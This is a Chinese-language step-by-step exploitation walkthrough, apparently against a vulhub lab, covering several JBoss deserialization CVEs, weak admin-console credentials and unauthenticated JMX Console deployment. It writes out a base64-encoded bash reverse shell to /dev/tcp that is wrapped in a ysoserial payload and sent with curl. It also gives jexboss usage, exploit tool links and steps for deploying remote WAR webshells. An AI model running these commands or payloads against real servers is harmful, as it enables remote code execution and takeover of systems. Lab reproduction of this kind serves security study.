1、CVE-2015-7501
1、漏洞复现
http://47.121.212.195:8080
2、POC,访问地址
47.121.212.195:8080/invoker/JMXInvokerServlet
返回如下,说明接⼝开放,此接⼝存在反序列化漏洞
3、下载 ysoserial ⼯具进⾏漏洞利⽤
https://github.com/frohoff/ysoserial
将反弹shell进⾏base64编码
bash -i >& /dev/tcp/47.121.212.195/6666 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMjEuMjEyLjE5NS82NjY2IDA+JjE=
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMjEuMjEyLjE5NS82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}">exp.ser
4、监听端口
5、执行命令
curl 47.121.212.195:8080/invoker/JMXInvokerServlet --data-binary @exp.ser
6、反弹成功
2、CVE-2017-7504
1、访问漏洞地址
47.121.212.195:8080/jbossmq-httpil/HTTPServerILServlet
2、获取shell
python3 jexboss.py -u http://47.121.212.195:8080
3、CVE-2017-12149
1、验证是否存在漏洞 , 访问
http://47.121.212.195:8080/invoker/readonly
该漏洞出现在/invoker/readonly中 ,服务器将⽤户post请求内容进⾏反序列化
返回500,说明⻚⾯存在,此⻚⾯存在反序列化漏洞
2、使⽤⼯具进⾏检测 DeserializeExploit 如果成功直接上传webshell即可:
⼯具:
https://cdn.vulhub.org/deserialization/DeserializeExploit.jar
也可以直接执⾏命令: https://github.com/yunxu1/jboss-_CVE-2017-12149
4、Administration Console弱⼝令
1、密码⽂件
/jboss-6.1.0.Final/server/default/conf/props/jmx-console-users.properties
账户密码:admin:vulhub
2、http://47.121.212.195:8080/admin-console/login.seam
3、登陆后台 admin/vulhub
4、点击web应用
5、上传后台1.war
6、使用工具连接
5、⾼版本JMX Console未授权
http://47.121.212.195:8080/jmx-console/
因为使⽤环境不存在该漏洞所以需要输⼊账户密码:admin vulhub
1、本地搭建部署点
在JMX Console⻚⾯点击jboss.system链接,在Jboss.system⻚⾯中点击service=MainDeployer,如下
2、进⼊service=MainDeployer⻚⾯之后,找到methodIndex为17或19的deploy 填写远程war包地址进⾏远程部署
3、搭建远程部署 , 部署远程war包地址
4、输⼊Invoke
http://47.121.212.195/cmd.war
5、使用工具连接
6、低版本JMX Console未授权
1、
2、找到jboss.deployment (jboss ⾃带得部署功能) 中的flavor=URL,type=DeploymentScanner点进去(通过URL的⽅式远程部署)
3、找到⻚⾯中的void addURL() 选项远程加载war包来部署。
4、制作war包 填写war包远程地址
5、工具连接